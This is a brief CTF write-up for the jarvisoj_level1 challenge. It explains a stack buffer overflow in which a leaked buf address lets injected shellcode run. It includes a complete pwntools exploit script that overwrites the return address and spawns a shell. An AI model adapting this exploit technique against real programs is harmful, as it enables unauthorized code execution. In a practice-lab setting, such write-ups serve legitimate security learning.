jarvisoj_level1

  • ret2shellcode
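  1. The binary contains a vulnerable function, vulnerable_function
  2. The printf call leaks the stack address of buf
  3. The read call overflows the buf variable
  4. Write shellcode into buf, then jump to buf on the stack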
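```python
from pwn import *

io = process('./level1')

# The binary prints the stack address of buf right after this prompt
io.recvuntil(b"What's this:")
# Parse the 10-character "0x........" leak as hex rather than eval()-ing program output
buf_addr = int(io.recv(10), 16)

shellcode = asm(shellcraft.sh())
# Pad to 0x88 bytes, overwrite the saved ebp, then set the return address to buf
payload = shellcode.ljust(0x88, b'\x00') + p32(0) + p32(buf_addr)
io.sendline(payload)
io.interactive()
```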
This post is licensed under CC BY 4.0 by the author.